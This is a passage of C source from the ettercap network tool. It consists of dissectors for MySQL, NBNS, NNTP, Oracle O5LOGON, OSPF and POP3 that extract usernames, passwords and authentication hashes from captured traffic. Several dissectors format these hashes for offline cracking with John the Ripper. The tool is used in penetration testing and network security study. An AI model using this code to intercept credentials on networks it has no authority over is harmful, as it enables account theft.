v5.xx.xx"); } else { SAFE_FREE(ident); return NULL; } if(old_mysql) { /* Search for 000 padding */ while( (ptr + index) < end && ((ptr[index] != 0) && (ptr[index - 1] != 0) && (ptr[index - 2] != 0)) ) index++; } /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_mysql)); s->flag = 0; if(old_mysql) { /* Save the seed */ s->data = strdup((const char*)ptr + index + 1); s->flag = 1; } else { int length; unsigned char seed[20]; ptr += 5; /* skip over Packet Length + Packet Number + protocol_version*/ length = strlen((const char*)ptr); ptr += (length + 1 + 4); /* skip over Version + Thread ID */ s->data = malloc(41); if (s->data == NULL) { /* oops, couldn't get memory */ DEBUG_MSG("\tUnable to allocate memory in Dissector..."); return NULL; } memcpy(seed, ptr, 8); ptr += (8 + 1 + 2 + 1 + 2 + 13); memcpy(seed + 8, ptr, 12); hex_encode(seed, 20, output); output[40] = 0; memcpy(s->data, output ,41); } /* save the session */ session_put(s); } } else { /* Packets coming from the client */ /* Only if we catched the connection from the beginning */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { if(!s->flag) { DEBUG_MSG("\tDissector_mysq DUMP ENCRYPTED"); /* Reach and save the username */ ptr += 36; PACKET->DISSECTOR.user = strdup((const char*)ptr); /* Reach the encrypted password */ ptr += (strlen(PACKET->DISSECTOR.user) + 1 + 1); if(ptr < end) { memcpy(input, ptr, 20); hex_encode(input, 20, output); output[40] = 0; has_password = 1; int length = strlen(s->data) + 256; SAFE_CALLOC(PACKET->DISSECTOR.pass, length, sizeof(char)); snprintf(PACKET->DISSECTOR.pass, length, "Seed:%s Encrypted:%s", (char *)s->data, output); } else { PACKET->DISSECTOR.pass = strdup("No Password!!!"); } DISSECT_MSG("MYSQL : %s:%d -> USER:%s %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); if(has_password) { /* output format for JtR */ DISSECT_MSG("%s*%d*%s:$mysqlna$%s*%s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, (char*)s->data, output); } dissect_wipe_session(PACKET, DISSECT_CODE(dissector_mysql)); } else { DEBUG_MSG("\tDissector_mysql DUMP ENCRYPTED"); /* Reach the username */ ptr += 9; /* save the username */ PACKET->DISSECTOR.user = strdup((const char*)ptr); /* Reach the encrypted password */ ptr += strlen(PACKET->DISSECTOR.user) + 1; if (ptr < end && strlen((const char*)ptr) != 0) { int length = strlen(s->data) + strlen((const char*)ptr) + 128; SAFE_CALLOC(PACKET->DISSECTOR.pass, length, sizeof(char)); snprintf(PACKET->DISSECTOR.pass, length, "Seed:%s Encrypted:%s", (char *)s->data, ptr); } else { PACKET->DISSECTOR.pass = strdup("No Password!!!"); } DISSECT_MSG("MYSQL : %s:%d -> USER:%s %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_mysql)); } } } SAFE_FREE(ident); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_nbns.c000664 000000 000000 00000010233 13711276346 020205 0ustar00rootroot000000 000000 /* ettercap -- dissector NBNS -- UDP 137 Copyright (C) Ettercap Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* * NBNS RFC: http://www.faqs.org/rfcs/rfc1002.html */ #define TYPE_NB 0x0020 #define TYPE_NBSTAT 0x0021 #define CLASS_IN 0x0001 #define NBNS_NAME_LEN 32 #define NBNS_DECODED_NAME_LEN 16 struct nbns_header { u_int16 transactid; /* Transaction ID */ #ifdef WORDS_BIGENDIAN u_char response: 1; /* response or query */ u_char opcode: 4; /* opcode */ /* nm_flags */ u_char aa: 1; u_char tc: 1; u_char rd: 1; u_char ra: 1; u_char unused: 2; u_char broadcast: 1; u_char rcode: 4; /* RCODE */ #else u_char rd: 1; u_char tc: 1; u_char aa: 1; u_char opcode: 4; u_char response: 1; u_char rcode: 4; u_char broadcast: 1; u_char unused: 2; u_char ra: 1; #endif u_int16 qd_count; /* QDCOUNT */ u_int16 an_count; /* AN_COUNT */ u_int16 ns_count; /* NS_COUNT */ u_int16 ar_count; /* AR_COUNT */ }; struct nbns_query { struct nbns_header header; char question[NBNS_NAME_LEN+2]; u_int16 type; u_int16 class; }; struct nbns_rdata { u_int16 len; u_int16 nbflags; u_int32 addr; }; #define NBNS_MSGLEN_QUERY_RESPONSE 70 #define NBNS_TTL_POS 12+1+NBNS_NAME_LEN+1+2+2 #define NBNS_RDATA_POS NBNS_TTL_POS + 2 #define NBNS_QUERY_POS 12 struct nbns_response { struct nbns_header header; char rr_name[NBNS_NAME_LEN+2]; /* RR_NAME */ u_int16 type; u_int16 class; u_int32 ttl; struct nbns_rdata rr_data; }; struct nbns_spoof_entry { char *name; struct ip_addr ip; /* no ipv6 nbns */ SLIST_ENTRY(nbns_spoof_entry) next; }; /* protos */ FUNC_DECODER(dissector_nbns); void nbns_init(void); static int nbns_expand(char *compressed, char *dst); /* * initializer */ void __init nbns_init(void) { dissect_add("nbns", APP_LAYER_UDP, 137, dissector_nbns); } FUNC_DECODER(dissector_nbns) { struct nbns_header *header; struct nbns_query *query; struct nbns_response *response; char name[NBNS_NAME_LEN]; char ip[IP_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; memset(name, 0, NBNS_NAME_LEN); header = (struct nbns_header *)po->DATA.data; DEBUG_MSG("NBNS dissector -> port 137"); /* HOOK_POINT: HOOK_PROTO_NBNS */ hook_point(HOOK_PROTO_NBNS, PACKET); if (header->response) { response = (struct nbns_response *)po->DATA.data; if (response->class != CLASS_IN) return NULL; nbns_expand(response->rr_name, name); struct ip_addr addr; ip_addr_init(&addr, AF_INET, (u_char*)&response->rr_data.addr); ip_addr_ntoa(&addr, ip); DEBUG_MSG("NBNS Transaction ID [0x%04x] Response: %s -> %s\n", ntohs(header->transactid), name, ip); } else { query = (struct nbns_query *)po->DATA.data; nbns_expand(query->question, name); DEBUG_MSG("NBNS Transaction ID [0x%04x] Query: %s", ntohs(header->transactid), name); } return NULL; } static int nbns_expand(char *compressed, char *dst) { //format compressed\00 int len = 0; int x=0; char j, k; for(len = 1; x < NBNS_NAME_LEN; len+=2){ j = (compressed[len] & 0x3f)-1; k = (compressed[len+1] & 0x3f)-1; dst[x/2] = (j<<4)+(k); x+=2; } char *s = strstr(dst, " "); if (s) *s = '\0'; return len; } ettercap-0.8.3.1/src/dissectors/ec_nntp.c000664 000000 000000 00000011422 13711276346 020225 0ustar00rootroot000000 000000 /* ettercap -- dissector NNTP -- TCP 119 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * The authentication schema can be found here: * * ftp://ftp.rfc-editor.org/in-notes/rfc2980.txt * */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_nntp); void nntp_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init nntp_init(void) { dissect_add("nntp", APP_LAYER_TCP, 119, dissector_nntp); sslw_dissect_add("nntps", 563, dissector_nntp, SSL_ENABLED); } FUNC_DECODER(dissector_nntp) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* the connection is starting... create the session */ CREATE_SESSION_ON_SYN_ACK("nntp", s, dissector_nntp); CREATE_SESSION_ON_SYN_ACK("nntps", s, dissector_nntp); /* check if it is the first packet sent by the server */ IF_FIRST_PACKET_FROM_SERVER_SSL("nntp", "nntps", s, ident, dissector_nntp) { DEBUG_MSG("\tdissector_nntp BANNER"); /* * get the banner * ptr + 4 to skip the initial 200 response */ if (!strncmp((const char*)ptr, "200", 3)) { PACKET->DISSECTOR.banner = strdup((const char*)ptr + 4); /* remove the \r\n */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '\r')) != NULL ) *ptr = '\0'; } } ENDIF_FIRST_PACKET_FROM_SERVER(s, ident) /* skip messages coming from the server */ if (FROM_SERVER("nntp", PACKET) || FROM_SERVER("nntps", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("NNTP --> TCP dissector_nntp"); /* skip the whitespaces at the beginning */ while(*ptr == ' ' && ptr != end) ptr++; /* reached the end */ if (ptr == end) return NULL; /* harvest the username */ if ( !strncasecmp((const char*)ptr, "AUTHINFO USER ", 14) ) { DEBUG_MSG("\tDissector_nntp USER"); /* create the session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_nntp)); ptr += 14; /* if not null, free it */ SAFE_FREE(s->data); /* fill the session data */ s->data = strdup((const char*)ptr); s->data_len = strlen((const char*)ptr); /* remove the \r\n */ if ( (ptr = (u_char*)strchr(s->data,'\r')) != NULL ) *ptr = '\0'; /* save the session */ session_put(s); return NULL; } /* harvest the password */ if ( !strncasecmp((const char*)ptr, "AUTHINFO PASS ", 14) ) { DEBUG_MSG("\tDissector_nntp PASS"); ptr += 14; /* create an ident to retrieve the session */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_nntp)); /* retrieve the session and delete it */ if (session_get_and_del(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } /* check that the user was sent before the pass */ if (s->data == NULL) { SAFE_FREE(ident); return NULL; } /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data); PACKET->DISSECTOR.pass = strdup((const char*)ptr); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; /* free the session */ session_free(s); SAFE_FREE(ident); DISSECT_MSG("NNTP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_o5logon.c000664 000000 000000 00000032216 13711276346 020634 0ustar00rootroot000000 000000 /* * ettercap -- dissector for Oracle O5LOGON protocol -- TCP 1521 * * Copyright (c) 2012-2014 Dhiru Kholia (dhiru at openwall.com) * Copyright (c) 2016 magnum * * Tested with Oracle 11gR1 and 11gR2 64-bit server and Linux + * Windows SQL*Plus clients. Now also works with Oracle 12. That * version avoids the known-plain vulnerability from PKCS#7 padding * so more fields are needed for a full attack. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. * */ #include #include #include #include #ifndef EC_O5LOGON_VERBOSE #define EC_O5LOGON_VERBOSE 0 #endif /* globals */ struct o5logon_status { u_char user[129]; struct ip_addr srv_addr; u_char srv_sk[97]; u_char cli_sk[97]; u_char pw[256]; u_char salt[21]; struct { u_int user : 1; u_int c_ano : 1; u_int c_sk : 1; u_int pw : 1; u_int s_ano : 1; u_int vfr : 1; u_int s_sk : 1; u_int pkcs : 2; } flags; }; /* PKCS#7 padding used? */ #define EC_O5LOGON_MAYBE_PKCS7 0 #define EC_O5LOGON_PKCS7 1 #define EC_O5LOGON_NO_PKCS7 2 /* protos */ FUNC_DECODER(dissector_o5logon); void o5logon_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init o5logon_init(void) { dissect_add("o5logon", APP_LAYER_TCP, 1521, dissector_o5logon); } FUNC_DECODER(dissector_o5logon) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; struct o5logon_status *conn_status = NULL; //suppress unused warning (void)end; (void)DECODE_DATA; (void)DECODE_DATALEN; (void)DECODED_LEN; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_o5logon)); if (FROM_CLIENT("o5logon", PACKET)) { u_char *ano; if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_o5logon)); SAFE_CALLOC(s->data, 1, sizeof(struct o5logon_status)); session_put(s); } /* Fetch state of existing session */ conn_status = (struct o5logon_status*)s->data; if (PACKET->DATA.len == 0) { /* * We output this packet just in case, but we may see more data * later and output another copy with more fields. See issue #741. */ if (conn_status->flags.pkcs != EC_O5LOGON_NO_PKCS7 && conn_status->flags.user && conn_status->flags.s_sk && conn_status->flags.vfr) { DISSECT_MSG("O5LOGON: %s@%s:$o5logon$%s*%s\n", conn_status->user, ip_addr_ntoa(&conn_status->srv_addr, tmp), conn_status->srv_sk, conn_status->salt); } if (PACKET->L4.flags & (TH_FIN | TH_RST)) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_o5logon)); } SAFE_FREE(ident); return NULL; } /* Interesting packets have len >= 24 */ if (PACKET->DATA.len < 24) { SAFE_FREE(ident); return NULL; } if ((ano = memmem(ptr, PACKET->DATA.len, "\xde\xad\xbe\xef", 4))) { conn_status->flags.c_ano = 1; ano += 25; #if EC_O5LOGON_VERBOSE DISSECT_MSG("O5LOGON: client ver %u.%u.%u.%u.%u (PKCS)\n", ano[0], ano[1] >> 4, ano[1] & 15 , ano[2], ano[3]); #endif if ((ano[0] << 16) + (ano[1] << 8) + ano[2] < 0x0a2003) { conn_status->flags.pkcs = EC_O5LOGON_PKCS7; } } else { u_char *csk; u_char *pw; if (conn_status->flags.user == 0) { u_char *sp; if ((sp = memmem(ptr, PACKET->DATA.len, "AUTH_TERMINAL", 13))) { /* Find username, best effort */ /* Names are 1 to 30 bytes and may include multibyte */ u_char *end = sp - 1; while(end > ptr && *end < 0x20) { end--; } while(end > ptr && *end == '\'' && end[1] == 0) { end--; } u_char *start = end; while(start > ptr && *start != 0xff && *start >= 0x20) { start--; } ++start; size_t length = (size_t)(end - start) + 1; strncpy((char*)conn_status->user, (char*)start, sizeof(conn_status->user) - 1); if (length < sizeof(conn_status->user)) conn_status->user[length] = 0; #if EC_O5LOGON_VERBOSE DISSECT_MSG("O5LOGON: %s:%d->%s:%d Got username %s%s\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), conn_status->user, conn_status->flags.c_ano == 1 ? "" : "(no ANO seen)"); #endif conn_status->flags.user = 1; } } if (conn_status->flags.pw == 0 && (pw = memmem(ptr, PACKET->DATA.len, "AUTH_PASSWORD", 13))) { char password[256 + 1]; int pwlen = 0; if (memrchr(pw, 0x60, 24)) { pwlen = 0x60; pw = memrchr(pw, 0x60, 24); } else pwlen = 0x40; if ((pw = memrchr(pw, 0x40, 24))) { int i; pw++; for (i = 0; i < 2 * pwlen; i++) { while (*pw == ' ') pw++; password[i] = *pw++; } password[pwlen] = 0; strncpy(conn_status->pw, password, sizeof(conn_status->pw)); #if EC_O5LOGON_VERBOSE DISSECT_MSG("O5LOGON: %s:%d->%s:%d Got encrypted password\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); #endif conn_status->flags.pw = 1; } } if (conn_status->flags.c_sk == 0 && (csk = memmem(ptr, PACKET->DATA.len, "AUTH_SESSKEY", 12))) { u_char sk[97]; int i; if (memrchr(csk, 0x40, 20)) csk = memrchr(csk, 0x40, 20); else csk = memrchr(csk, 0x60, 20); if (csk) { csk++; for (i = 0; i < 96; i++) { while (*csk == ' ') csk++; sk[i] = *csk++; } sk[96] = 0; strncpy(conn_status->cli_sk, sk, sizeof(conn_status->cli_sk)); conn_status->flags.c_sk = 1; #if EC_O5LOGON_VERBOSE DISSECT_MSG("O5LOGON: %s:%d->%s:%d Got client session key\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); #endif } #if EC_O5LOGON_VERBOSE else { DISSECT_MSG("O5LOGON: %s:%d->%s:%d saw AUTH_SESSKEY but " "couldn't parse client session key?\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); } #endif } } if (conn_status && conn_status->flags.user && conn_status->flags.s_sk && conn_status->flags.vfr && conn_status->flags.pw && conn_status->flags.c_sk) { DISSECT_MSG("O5LOGON: %s@%s:$o5logon$%s*%s*%s*%s\n", conn_status->user, ip_addr_ntoa(&conn_status->srv_addr, tmp), conn_status->srv_sk, conn_status->salt, conn_status->pw, conn_status->cli_sk); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_o5logon)); } } else { /* From server */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct o5logon_status*)s->data; if (conn_status->flags.s_ano == 0) { if (PACKET->DATA.len > 32) { u_char *ano = memmem(ptr, PACKET->DATA.len, "\xde\xad\xbe\xef", 4); if (ano) { ano += 25; conn_status->flags.s_ano = 1; #if EC_O5LOGON_VERBOSE DISSECT_MSG("O5LOGON: server ver %u.%u.%u.%u.%u\n", ano[0], ano[1] >> 4, ano[1] & 15 , ano[2], ano[3]); #endif if (ano[0] >= 0x0c) { conn_status->flags.pkcs = EC_O5LOGON_NO_PKCS7; } else if ((ano[0] << 16) + (ano[1] << 8) + ano[2] < 0x0a2003) { conn_status->flags.pkcs = EC_O5LOGON_PKCS7; } } } } if (PACKET->DATA.len > 32) { if (conn_status->flags.vfr == 0) { u_char salt[21]; u_char *saltp = memmem(ptr, PACKET->DATA.len, "AUTH_VFR_DATA", 13); if (saltp) saltp = memrchr(saltp, 0x14, 20); if (saltp) { saltp++; strncpy((char*)salt, (char*)saltp, 20); salt[20] = 0; strncpy(conn_status->salt, salt, sizeof(conn_status->salt)); #if EC_O5LOGON_VERBOSE DISSECT_MSG("O5LOGON: %s:%d->%s:%d Got VFR\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); #endif conn_status->flags.vfr = 1; } } if (conn_status->flags.s_sk == 0) { u_char sk[97]; u_char *skp = memmem(ptr, PACKET->DATA.len, "AUTH_SESSKEY", 12); int i; if (skp) { if (memrchr(skp, 0x40, 20)) skp = memrchr(skp, 0x40, 20); else skp = memrchr(skp, 0x60, 20); } if (skp) { skp++; for (i = 0; i < 96; i++) { while (*skp == ' ') skp++; sk[i] = *skp++; } sk[96] = 0; memcpy(&conn_status->srv_addr, &PACKET->L3.src, sizeof(conn_status->srv_addr)); strncpy(conn_status->srv_sk, sk, sizeof(conn_status->srv_sk)); #if EC_O5LOGON_VERBOSE DISSECT_MSG("O5LOGON: %s:%d->%s:%d Got server session key\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); #endif conn_status->flags.s_sk = 1; } } } if (memmem(ptr, PACKET->DATA.len, "invalid username", 16)) { DISSECT_MSG("O5LOGON: Login to %s:%d as %s failed! " "Invalid username or password\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), conn_status->user); conn_status->flags.user = 0; conn_status->flags.s_sk = 0; conn_status->flags.vfr = 0; conn_status->flags.pw = 0; conn_status->flags.c_sk = 0; } else if (memmem(ptr, PACKET->DATA.len, "account is locked", 17)) { DISSECT_MSG("O5LOGON: Login to %s:%d as %s failed, account locked!\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), conn_status->user); conn_status->flags.user = 0; conn_status->flags.s_sk = 0; conn_status->flags.vfr = 0; conn_status->flags.pw = 0; conn_status->flags.c_sk = 0; } #if EC_O5LOGON_VERBOSE } else { DISSECT_MSG("O5LOGON: No session; %s:%d -> %s:%d\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); #endif } } SAFE_FREE(ident); return NULL; } // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_ospf.c000664 000000 000000 00000015621 13711276346 020222 0ustar00rootroot000000 000000 /* ettercap -- dissector ospf -- works over IP ! Copyright (C) ALoR & NaGA Copyright (C) Dhiru Kholia (dhiru [at] openwall.com) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * RFC: 2328 * * 0 1 2 3 * 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Version # | Type | Packet length | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Router ID | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Area ID | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Checksum | AuType | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Authentication | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * | Authentication | * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ * * * RFC 5709 is relevant for OSPFv2 HMAC-SHA Cryptographic Authentication. */ #include #include #include #define OSPF_NO_AUTH 0 #define OSPF_AUTH 1 // OSPF_AUTH_SIMPLE #define OSPF_AUTH_CRYPTOGRAPHIC 2 /* borrowed from GNU Zebra project */ #define BUFSIZE 2048 /* big enough for OSPF */ #define OSPF_HEADER_SIZE 24U #define OSPF_AUTH_SIMPLE_SIZE 8U #define OSPF_AUTH_MD5_SIZE 16U #define OSPF_AUTH_HMAC_SHA1_SIZE 20U #define OSPF_AUTH_HMAC_SHA256_SIZE 32U #define OSPF_AUTH_HMAC_SHA384_SIZE 48U #define OSPF_AUTH_HMAC_SHA512_SIZE 64U struct ospf_header { u_int8 version; /* OSPF Version. */ u_int8 type; /* Packet Type. */ u_int16 length; /* Packet Length. */ struct in_addr router_id; /* Router ID. */ struct in_addr area_id; /* Area ID. */ u_int16 checksum; /* Check Sum. */ u_int16 auth_type; /* Authentication Type. */ /* Authentication Data. */ union { /* Simple Authentication. */ u_char auth_data [OSPF_AUTH_SIMPLE_SIZE]; /* Cryptographic Authentication. */ struct { u_int16_t zero; /* Should be 0. */ u_char key_id; /* Key ID. */ u_char auth_data_len; /* Auth Data Length. */ u_int32_t crypt_seqnum; /* Cryptographic Sequence Number. */ } crypt; } u; }; /* protos */ FUNC_DECODER(dissector_ospf); void ospf_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ospf_init(void) { dissect_add("ospf", PROTO_LAYER, NL_TYPE_OSPF, dissector_ospf); } /* * the passwords collected by ospf will not be logged * in logfile since it is not over TCP or UDP. * anyway we can print them in the user message window */ FUNC_DECODER(dissector_ospf) { // DECLARE_DISP_PTR_END(ptr, end); // this is broken! u_int8 *ptr = buf; char tmp[MAX_ASCII_ADDR_LEN]; char pass[12]; /* don't complain about unused var */ (void) DECODED_LEN; // (void)end; /* skip empty packets */ // if (PACKET->DATA.len == 0) { // this is broken! if (buflen == 0) { return NULL; } DEBUG_MSG("OSPF --> dissector_ospf"); struct ospf_header *ohdr = (struct ospf_header *)ptr; /* authentication */ if ( ntohs(ohdr->auth_type) == OSPF_AUTH_CRYPTOGRAPHIC ) { unsigned int i = 0; unsigned int length = ntohs(ohdr->length); unsigned auth_data_len = ohdr->u.crypt.auth_data_len; int type = 0; /* validate the packet */ if (length * 2 > BUFSIZE) return NULL; if (length > buflen) return NULL; if (auth_data_len == OSPF_AUTH_MD5_SIZE) { DISSECT_MSG("OSPF-%s-%d:$netmd5$", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); } else if (auth_data_len == OSPF_AUTH_HMAC_SHA1_SIZE) { type = 1; } else if (auth_data_len == OSPF_AUTH_HMAC_SHA256_SIZE) { type = 2; } else if (auth_data_len == OSPF_AUTH_HMAC_SHA384_SIZE) { type = 3; } else if (auth_data_len == OSPF_AUTH_HMAC_SHA512_SIZE) { type = 4; } else { return NULL; } if (type != 0) { DISSECT_MSG("OSPF-%s-%d:$ospf$%d$", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), type); } for (i=0; iauth_type) == OSPF_AUTH ) { /* Simple Authentication */ DEBUG_MSG("\tDissector_ospf PASS"); /* * we use a local variable since this does * not need to reach the top half */ char o[OSPF_AUTH_SIMPLE_SIZE]; snprintf(o, OSPF_AUTH_SIMPLE_SIZE, "%s", ohdr->u.auth_data); strncpy(pass, o, OSPF_AUTH_SIMPLE_SIZE); DISSECT_MSG("OSPF : %s:%d -> AUTH: %s \n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), pass); } /* no authentication */ else if ( ntohs(ohdr->auth_type) == OSPF_NO_AUTH ) { DEBUG_MSG("\tDissector_ospf NO AUTH"); strncpy(pass, "No Auth", 8); DISSECT_MSG("OSPF : %s:%d -> AUTH: %s \n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), pass); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_pop.c000664 000000 000000 00000030654 13711276346 020054 0ustar00rootroot000000 000000 /* ettercap -- dissector POP3 -- TCP 110 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * The authentication schema can be found here: * * ftp://ftp.rfc-editor.org/in-notes/std/std53.txt * * we currently support: * - USER & PASS * - APOP * - AUTH LOGIN (SASL) */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_pop); void pop_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init pop_init(void) { dissect_add("pop3", APP_LAYER_TCP, 110, dissector_pop); sslw_dissect_add("pop3s", 995, dissector_pop, SSL_ENABLED); } FUNC_DECODER(dissector_pop) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* the connection is starting... create the session */ CREATE_SESSION_ON_SYN_ACK("pop3", s, dissector_pop); /* create the session even if we are into an ssl tunnel */ CREATE_SESSION_ON_SYN_ACK("pop3s", s, dissector_pop); /* check if it is the first packet sent by the server */ if ((FROM_SERVER("pop3", PACKET) || FROM_SERVER("pop3s", PACKET)) && PACKET->L4.flags & TH_PSH) { dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_pop)); /* the session exist */ if (session_get(&s, ident, DISSECT_IDENT_LEN) != -E_NOTFOUND) { /* prevent the deletion of session created for the user and pass */ if (s->data == NULL) { /* get the banner */ if (!strncmp((const char*)ptr, "+OK", 3)) PACKET->DISSECTOR.banner = strdup((const char*)ptr + 4); else { SAFE_FREE(ident); return NULL; } 